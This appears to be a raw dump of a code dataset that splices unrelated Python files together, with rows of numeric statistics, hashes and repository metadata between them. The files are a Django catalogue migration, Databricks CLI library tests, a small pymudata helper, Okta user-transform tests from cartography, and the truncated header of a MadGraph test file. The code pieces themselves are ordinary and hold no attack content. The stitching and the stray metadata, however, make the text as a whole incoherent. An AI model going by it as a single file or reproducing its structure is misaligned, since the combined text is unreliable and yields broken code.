from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
from django.contrib.postgres.operations import BtreeGinExtension
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
BtreeGinExtension(),
migrations.CreateModel(
name='Category',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.TextField(db_index=True)),
('level', models.IntegerField(default=0)),
('order', models.IntegerField(default=0)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('parent', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.category')),
],
options={
'ordering': ['created'],
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('key', models.CharField(max_length=32, unique=True)),
('key_digit', models.CharField(default=None, max_length=32, null=True)),
('name', models.TextField(db_index=True, default=None, null=True)),
('html', models.TextField(db_index=True, default=None, null=True)),
('full_name', models.TextField(db_index=True, default=None, null=True)),
('quantity', models.FloatField(default=1.0)),
('rate', models.FloatField(default=1.0)),
],
options={
'ordering': ['key'],
},
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('file_name', models.TextField(default=None, null=True)),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
],
options={
'ordering': ['-created'],
},
),
migrations.CreateModel(
name='Parameter',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.TextField(db_index=True, default=None, null=True)),
('description', models.TextField(default=None, null=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
},
),
migrations.CreateModel(
name='ParameterGroup',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.TextField(db_index=True, default=None, null=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
},
),
migrations.CreateModel(
name='Price',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('value', models.DecimalField(decimal_places=2, max_digits=18)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('currency', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.currency')),
],
options={
'ordering': ['created'],
},
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('part_number', models.TextField(db_index=True, default=None, null=True)),
('names_search', models.TextField(db_index=True, default=None, null=True)),
('parameters_search', models.TextField(db_index=True, default=None, null=True)),
('slug', models.TextField(db_index=True, default=None, null=True)),
('name', models.TextField(db_index=True, default=None, null=True)),
('short_name', models.TextField(db_index=True, default=None, null=True)),
('name_rus', models.TextField(db_index=True, default=None, null=True)),
('name_other', models.TextField(db_index=True, default=None, null=True)),
('description', models.TextField(default=None, null=True)),
('warranty', models.TextField(default=None, null=True)),
('ean_128', models.TextField(db_index=True, default=None, null=True)),
('upc', models.TextField(db_index=True, default=None, null=True)),
('pnc', models.TextField(db_index=True, default=None, null=True)),
('hs_code', models.TextField(db_index=True, default=None, null=True)),
('gtin', models.TextField(db_index=True, default=None, null=True)),
('tnved', models.TextField(db_index=True, default=None, null=True)),
('traceable', models.BooleanField(db_index=True, default=None, null=True)),
('quantity', models.IntegerField(default=None, null=True)),
('quantity_great_than', models.BooleanField(db_index=True, default=None, null=True)),
('weight', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
('width', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
('height', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
('depth', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
('volume', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
('multiplicity', models.IntegerField(default=None, null=True)),
('content', models.TextField(default=None, null=True)),
('content_loaded', models.DateTimeField(default=None, null=True)),
('images_loaded', models.DateTimeField(default=None, null=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=None, null=True)),
('edited', models.DateTimeField(default=None, null=True)),
('category', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.category')),
('price', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.price')),
],
options={
'ordering': ['-created'],
},
),
migrations.CreateModel(
name='Unit',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.TextField(db_index=True, default=None, null=True)),
('full_name', models.TextField(db_index=True, default=None, null=True)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='Vendor',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.TextField(db_index=True)),
('slug', models.TextField(db_index=True, default=None, null=True)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='ProductImage',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('source_url', models.TextField(db_index=True, default=None, null=True)),
('file_name', models.TextField(default=None, null=True)),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
('product', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.product')),
],
options={
'ordering': ['created'],
},
),
migrations.AddField(
model_name='product',
name='unit',
field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.unit'),
),
migrations.AddField(
model_name='product',
name='vendor',
field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.vendor'),
),
migrations.CreateModel(
name='ParameterValue',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('value', models.TextField(db_index=True, default=None, null=True)),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
('parameter', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.parameter')),
('product', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.product')),
('unit', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.unit')),
],
options={
'ordering': ['created'],
},
),
migrations.AddField(
model_name='parameter',
name='group',
field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.parametergroup'),
),
migrations.CreateModel(
name='CatalogElement',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.TextField(db_index=True)),
('slug', models.TextField(db_index=True, default=None, null=True)),
('path', models.TextField(db_index=True, default=None, null=True)),
('content', models.TextField(default=None, null=True)),
('description', models.TextField(default=None, null=True)),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
('edited', models.DateTimeField(db_index=True, default=None, null=True)),
('published', models.DateTimeField(db_index=True, default=None, null=True)),
('image', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.image')),
('parent', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.catalogelement')),
],
options={
'ordering': ['-created'],
},
),
migrations.CreateModel(
name='Article',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.TextField(db_index=True)),
('slug', models.TextField(db_index=True, default=None, null=True)),
('path', models.TextField(db_index=True, default=None, null=True)),
('content', models.TextField(default=None, null=True)),
('description', models.TextField(default=None, null=True)),
('assistant', models.BooleanField(db_index=True, default=False)),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
('edited', models.DateTimeField(db_index=True, default=None, null=True)),
('published', models.DateTimeField(db_index=True, default=None, null=True)),
('image', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.image')),
('parent', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.catalogelement')),
],
options={
'ordering': ['-created'],
},
),
migrations.AddIndex(
model_name='product',
index=django.contrib.postgres.indexes.GinIndex(fields=['names_search', 'parameters_search'], name='product_search_idx'),
),
]
| 55.004065
| 163
| 0.578745
| 1,359
| 13,531
| 5.663723
| 0.105224
| 0.073795
| 0.124724
| 0.157984
| 0.856048
| 0.841237
| 0.783162
| 0.758997
| 0.73756
| 0.67208
| 0
| 0.006171
| 0.269455
| 13,531
| 245
| 164
| 55.228571
| 0.772484
| 0.003326
| 0
| 0.617647
| 1
| 0
| 0.094705
| 0.004672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02521
| 0
| 0.042017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96a31767e6d4518787d97f43eb18f76c138512fe
| 13,208
|
py
|
Python
|
tests/libraries/test_cli.py
|
arulajmani/databricks-cli
|
2740846d8a88605747677d3ee9dd7222ab825bac
|
[
"Apache-2.0"
] | 1
|
2020-02-08T16:42:02.000Z
|
2020-02-08T16:42:02.000Z
|
tests/libraries/test_cli.py
|
arulajmani/databricks-cli
|
2740846d8a88605747677d3ee9dd7222ab825bac
|
[
"Apache-2.0"
] | null | null | null |
tests/libraries/test_cli.py
|
arulajmani/databricks-cli
|
2740846d8a88605747677d3ee9dd7222ab825bac
|
[
"Apache-2.0"
] | null | null | null |
# Databricks CLI
# Copyright 2017 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"), except
# that the use of services to which certain application programming
# interfaces (each, an "API") connect requires that the user first obtain
# a license for the use of the APIs from Databricks, Inc. ("Databricks"),
# by creating an account at www.databricks.com and agreeing to either (a)
# the Community Edition Terms of Service, (b) the Databricks Terms of
# Service, or (c) another written agreement between Licensee and Databricks
# for the use of the APIs.
#
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint:disable=redefined-outer-name
import itertools
import mock
import pytest
from click.testing import CliRunner
import databricks_cli.libraries.cli as cli
from databricks_cli.utils import pretty_format
from tests.utils import provide_conf, assert_cli_output
TEST_CLUSTER_ID = '0213-212348-veeps379'
ALL_CLUSTER_STATUSES_RETURN = {
'statuses': [{
'library_statuses': [{
'status': 'INSTALLED',
'is_library_for_all_clusters': False,
'library': {
'jar': 'dbfs:/test.jar'
}
}],
'cluster_id': TEST_CLUSTER_ID
}]
}
@pytest.fixture()
def libraries_api_mock():
with mock.patch('databricks_cli.libraries.cli.LibrariesApi') as LibrariesApi:
_libraries_api_mock = mock.MagicMock()
LibrariesApi.return_value = _libraries_api_mock
yield _libraries_api_mock
@provide_conf
def test_all_cluster_statuses_cli(libraries_api_mock):
libraries_api_mock.all_cluster_statuses.return_value = ALL_CLUSTER_STATUSES_RETURN
runner = CliRunner()
res = runner.invoke(cli.all_cluster_statuses_cli)
libraries_api_mock.all_cluster_statuses.assert_called_once()
assert_cli_output(res.output, pretty_format(ALL_CLUSTER_STATUSES_RETURN))
@provide_conf
def test_list_cli_without_cluster_id(libraries_api_mock):
libraries_api_mock.all_cluster_statuses.return_value = ALL_CLUSTER_STATUSES_RETURN
runner = CliRunner()
res = runner.invoke(cli.list_cli)
libraries_api_mock.all_cluster_statuses.assert_called_once()
assert_cli_output(res.output, pretty_format(ALL_CLUSTER_STATUSES_RETURN))
CLUSTER_STATUS_RETURN = {
'library_statuses': [{
'status': 'INSTALLED',
'is_library_for_all_clusters': False,
'library': {
'jar': 'dbfs:/test.jar',
}
}],
'cluster_id': '0213-212348-veeps379'
}
@provide_conf
def test_cluster_status_cli(libraries_api_mock):
libraries_api_mock.cluster_status.return_value = CLUSTER_STATUS_RETURN
runner = CliRunner()
res = runner.invoke(cli.cluster_status_cli, ['--cluster-id', TEST_CLUSTER_ID])
libraries_api_mock.cluster_status.assert_called_with(TEST_CLUSTER_ID)
assert_cli_output(res.output, pretty_format(CLUSTER_STATUS_RETURN))
@provide_conf
def test_list_cli_with_cluster_id(libraries_api_mock):
libraries_api_mock.cluster_status.return_value = CLUSTER_STATUS_RETURN
runner = CliRunner()
res = runner.invoke(cli.list_cli, ['--cluster-id', TEST_CLUSTER_ID])
libraries_api_mock.cluster_status.assert_called_with(TEST_CLUSTER_ID)
assert_cli_output(res.output, pretty_format(CLUSTER_STATUS_RETURN))
@provide_conf
def test_install_cli_with_multiple_oneof(libraries_api_mock):
for lib_a, lib_b in itertools.combinations(cli.INSTALL_OPTIONS, 2):
runner = CliRunner()
res = runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--{}'.format(lib_a), 'test_a',
'--{}'.format(lib_b), 'test_b'])
libraries_api_mock.install_libraries.assert_not_called()
assert 'Only one of {} should be provided'.format(cli.INSTALL_OPTIONS) in res.output
@provide_conf
def test_install_cli_jar(libraries_api_mock):
test_jar = 'dbfs:/test.jar'
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--jar', test_jar])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{'jar': test_jar}])
@provide_conf
def test_install_cli_egg(libraries_api_mock):
test_egg = 'dbfs:/test.egg'
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--egg', test_egg])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{'egg': test_egg}])
@provide_conf
def test_install_cli_wheel(libraries_api_mock):
test_wheel = 'dbfs:/test.whl'
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--whl', test_wheel])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{'whl': test_wheel}])
@provide_conf
def test_install_cli_maven(libraries_api_mock):
test_maven_coordinates = 'org.jsoup:jsoup:1.7.2'
test_maven_repo = 'https://maven.databricks.com'
test_maven_exclusions = ['a', 'b']
# Coordinates
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--maven-coordinates', test_maven_coordinates])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'maven': {
'coordinates': test_maven_coordinates
}
}])
# Coordinates, Repo
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--maven-coordinates', test_maven_coordinates,
'--maven-repo', test_maven_repo])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'maven': {
'coordinates': test_maven_coordinates,
'repo': test_maven_repo
}
}])
# Coordinates, Repo, Exclusions
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--maven-coordinates', test_maven_coordinates,
'--maven-repo', test_maven_repo,
'--maven-exclusion', test_maven_exclusions[0],
'--maven-exclusion', test_maven_exclusions[1]])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'maven': {
'coordinates': test_maven_coordinates,
'repo': test_maven_repo,
'exclusions': test_maven_exclusions
}
}])
@provide_conf
def test_install_cli_pypi(libraries_api_mock):
test_pypi_package = 'databricks-cli'
test_pypi_repo = 'https://pypi.databricks.com'
# Coordinates
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--pypi-package', test_pypi_package,
'--pypi-repo', test_pypi_repo])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'pypi': {
'package': test_pypi_package,
'repo': test_pypi_repo
}
}])
@provide_conf
def test_install_cli_cran(libraries_api_mock):
test_cran_package = 'cran-package'
test_cran_repo = 'https://cran.databricks.com'
# Coordinates
runner = CliRunner()
runner.invoke(cli.install_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--cran-package', test_cran_package,
'--cran-repo', test_cran_repo])
libraries_api_mock.install_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'cran': {
'package': test_cran_package,
'repo': test_cran_repo
}
}])
@provide_conf
def test_uninstall_cli_with_multiple_oneof(libraries_api_mock):
for lib_a, lib_b in itertools.combinations(cli.INSTALL_OPTIONS, 2):
runner = CliRunner()
res = runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--{}'.format(lib_a), 'test_a',
'--{}'.format(lib_b), 'test_b'])
libraries_api_mock.uninstall_libraries.assert_not_called()
assert 'Only one of {} should be provided'.format(cli.UNINSTALL_OPTIONS) in res.output
@provide_conf
def test_uninstall_cli_all(libraries_api_mock):
test_jar = 'dbfs:/test.jar'
runner = CliRunner()
libraries_api_mock.cluster_status.return_value = {
"library_statuses": [
{
"status": "INSTALLED",
"is_library_for_all_clusters": False,
"library": {
"jar": test_jar
}
}
],
"cluster_id": TEST_CLUSTER_ID,
}
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--all'])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{'jar': test_jar}])
@provide_conf
def test_uninstall_cli_all_for_no_libraries(libraries_api_mock):
runner = CliRunner()
libraries_api_mock.cluster_status.return_value = {
"library_statuses": [
],
"cluster_id": TEST_CLUSTER_ID,
}
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--all'])
libraries_api_mock.uninstall_libraries.assert_not_called()
@provide_conf
def test_uninstall_cli_jar(libraries_api_mock):
test_jar = 'dbfs:/test.jar'
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--jar', test_jar])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{'jar': test_jar}])
@provide_conf
def test_uninstall_cli_egg(libraries_api_mock):
test_egg = 'dbfs:/test.egg'
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--egg', test_egg])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{'egg': test_egg}])
@provide_conf
def test_uninstall_cli_whl(libraries_api_mock):
test_whl = 'dbfs:/test.whl'
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--whl', test_whl])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{'whl': test_whl}])
@provide_conf
def test_uninstall_cli_maven(libraries_api_mock):
test_maven_coordinates = 'org.jsoup:jsoup:1.7.2'
test_maven_repo = 'https://maven.databricks.com'
test_maven_exclusions = ['a', 'b']
# Coordinates
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--maven-coordinates', test_maven_coordinates])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'maven': {
'coordinates': test_maven_coordinates
}
}])
# Coordinates, Repo
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--maven-coordinates', test_maven_coordinates,
'--maven-repo', test_maven_repo])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'maven': {
'coordinates': test_maven_coordinates,
'repo': test_maven_repo
}
}])
# Coordinates, Repo, Exclusions
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--maven-coordinates', test_maven_coordinates,
'--maven-repo', test_maven_repo,
'--maven-exclusion', test_maven_exclusions[0],
'--maven-exclusion', test_maven_exclusions[1]])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'maven': {
'coordinates': test_maven_coordinates,
'repo': test_maven_repo,
'exclusions': test_maven_exclusions
}
}])
@provide_conf
def test_uninstall_cli_pypi(libraries_api_mock):
test_pypi_package = 'databricks-cli'
test_pypi_repo = 'https://pypi.databricks.com'
# Coordinates
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--pypi-package', test_pypi_package,
'--pypi-repo', test_pypi_repo])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'pypi': {
'package': test_pypi_package,
'repo': test_pypi_repo
}
}])
@provide_conf
def test_uninstall_cli_cran(libraries_api_mock):
test_cran_package = 'cran-package'
test_cran_repo = 'https://cran.databricks.com'
# Coordinates
runner = CliRunner()
runner.invoke(cli.uninstall_cli, [
'--cluster-id', TEST_CLUSTER_ID,
'--cran-package', test_cran_package,
'--cran-repo', test_cran_repo])
libraries_api_mock.uninstall_libraries.assert_called_with(TEST_CLUSTER_ID, [{
'cran': {
'package': test_cran_package,
'repo': test_cran_repo
}
}])
| 34.217617
| 99
| 0.685645
| 1,624
| 13,208
| 5.19335
| 0.105911
| 0.077899
| 0.102442
| 0.059284
| 0.832108
| 0.826773
| 0.802585
| 0.785037
| 0.767963
| 0.765355
| 0
| 0.004357
| 0.200712
| 13,208
| 385
| 100
| 34.306494
| 0.794544
| 0.092898
| 0
| 0.725166
| 0
| 0
| 0.141458
| 0.013727
| 0
| 0
| 0
| 0
| 0.102649
| 1
| 0.069536
| false
| 0
| 0.023179
| 0
| 0.092715
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
737e2d4b6b73982878a4c876ce9847472ba73d8d
| 110
|
py
|
Python
|
pymudata/utils.py
|
b3by/pymudata
|
41cc3b144c78da7f50e0942767cd6b19f19fa97b
|
[
"MIT"
] | null | null | null |
pymudata/utils.py
|
b3by/pymudata
|
41cc3b144c78da7f50e0942767cd6b19f19fa97b
|
[
"MIT"
] | null | null | null |
pymudata/utils.py
|
b3by/pymudata
|
41cc3b144c78da7f50e0942767cd6b19f19fa97b
|
[
"MIT"
] | null | null | null |
from .activity import Activity
def from_file(file_path, **kwargs):
return Activity(file_path, **kwargs)
| 18.333333
| 40
| 0.745455
| 15
| 110
| 5.266667
| 0.533333
| 0.202532
| 0.35443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 110
| 5
| 41
| 22
| 0.840426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
7383611f7721d00913ff4d2a677b289f81483afc
| 5,200
|
py
|
Python
|
tests/unit/cartography/intel/okta/test_user.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 2,322
|
2019-03-02T01:07:20.000Z
|
2022-03-31T20:39:12.000Z
|
tests/unit/cartography/intel/okta/test_user.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 462
|
2019-03-07T18:38:11.000Z
|
2022-03-31T14:55:20.000Z
|
tests/unit/cartography/intel/okta/test_user.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 246
|
2019-03-03T02:39:23.000Z
|
2022-02-24T09:46:38.000Z
|
from cartography.intel.okta.users import transform_okta_user
from tests.data.okta.users import create_test_user
def test_user_transform_with_all_values():
user = create_test_user()
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': '01/01/2019, 00:00:01',
'created': '01/01/2019, 00:00:01',
'status_changed': '01/01/2019, 00:00:01',
'last_login': '01/01/2019, 00:00:01',
'okta_last_updated': '01/01/2019, 00:00:01',
'password_changed': '01/01/2019, 00:00:01',
'transition_to_status': user.transitioningToStatus,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
def test_userprofile_transform_with_no_activated():
user = create_test_user()
user.activated = None
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': None,
'created': '01/01/2019, 00:00:01',
'status_changed': '01/01/2019, 00:00:01',
'last_login': '01/01/2019, 00:00:01',
'okta_last_updated': '01/01/2019, 00:00:01',
'password_changed': '01/01/2019, 00:00:01',
'transition_to_status': user.transitioningToStatus,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
def test_userprofile_transform_with_no_status_changed():
user = create_test_user()
user.statusChanged = None
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': '01/01/2019, 00:00:01',
'created': '01/01/2019, 00:00:01',
'status_changed': None,
'last_login': '01/01/2019, 00:00:01',
'okta_last_updated': '01/01/2019, 00:00:01',
'password_changed': '01/01/2019, 00:00:01',
'transition_to_status': user.transitioningToStatus,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
def test_userprofile_transform_with_no_last_login():
user = create_test_user()
user.lastLogin = None
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': '01/01/2019, 00:00:01',
'created': '01/01/2019, 00:00:01',
'status_changed': '01/01/2019, 00:00:01',
'last_login': None,
'okta_last_updated': '01/01/2019, 00:00:01',
'password_changed': '01/01/2019, 00:00:01',
'transition_to_status': user.transitioningToStatus,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
def test_userprofile_transform_with_no_last_updated():
user = create_test_user()
user.lastUpdated = None
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': '01/01/2019, 00:00:01',
'created': '01/01/2019, 00:00:01',
'status_changed': '01/01/2019, 00:00:01',
'last_login': '01/01/2019, 00:00:01',
'okta_last_updated': None,
'password_changed': '01/01/2019, 00:00:01',
'transition_to_status': user.transitioningToStatus,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
def test_userprofile_transform_with_no_password_changed():
user = create_test_user()
user.passwordChanged = None
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': '01/01/2019, 00:00:01',
'created': '01/01/2019, 00:00:01',
'status_changed': '01/01/2019, 00:00:01',
'last_login': '01/01/2019, 00:00:01',
'okta_last_updated': '01/01/2019, 00:00:01',
'password_changed': None,
'transition_to_status': user.transitioningToStatus,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
def test_userprofile_transform_with_no_transition_status():
user = create_test_user()
user.transitioningToStatus = None
result = transform_okta_user(user)
expected = {
'id': user.id,
'activated': '01/01/2019, 00:00:01',
'created': '01/01/2019, 00:00:01',
'status_changed': '01/01/2019, 00:00:01',
'last_login': '01/01/2019, 00:00:01',
'okta_last_updated': '01/01/2019, 00:00:01',
'password_changed': '01/01/2019, 00:00:01',
'transition_to_status': None,
'login': user.profile.login,
'email': user.profile.email,
'last_name': user.profile.lastName,
'first_name': user.profile.firstName,
}
assert result == expected
| 30.588235
| 60
| 0.616538
| 666
| 5,200
| 4.611111
| 0.070571
| 0.048193
| 0.096386
| 0.120482
| 0.902963
| 0.874308
| 0.855422
| 0.855422
| 0.855422
| 0.855422
| 0
| 0.129955
| 0.233462
| 5,200
| 169
| 61
| 30.769231
| 0.640492
| 0
| 0
| 0.791045
| 0
| 0
| 0.309231
| 0
| 0
| 0
| 0
| 0
| 0.052239
| 1
| 0.052239
| false
| 0.067164
| 0.014925
| 0
| 0.067164
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
7388f6569369d7c2f4b72311b7c39b308316d0f6
| 160,950
|
py
|
Python
|
tests/unit_tests/core/test_diagram_generation.py
|
valassi/mg5amc_test
|
2e04f23353051f64e1604b23105fe3faabd32869
|
[
"NCSA"
] | 1
|
2016-07-09T00:05:56.000Z
|
2016-07-09T00:05:56.000Z
|
tests/unit_tests/core/test_diagram_generation.py
|
valassi/mg5amc_test
|
2e04f23353051f64e1604b23105fe3faabd32869
|
[
"NCSA"
] | 4
|
2022-03-10T09:13:31.000Z
|
2022-03-30T16:15:01.000Z
|
tests/unit_tests/core/test_diagram_generation.py
|
valassi/mg5amc_test
|
2e04f23353051f64e1604b23105fe3faabd32869
|
[
"NCSA"
] | 1
|
2016-07-09T00:06:15.000Z
|
2016-07-09T00:06:15.000Z
|
################################################################################
#
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
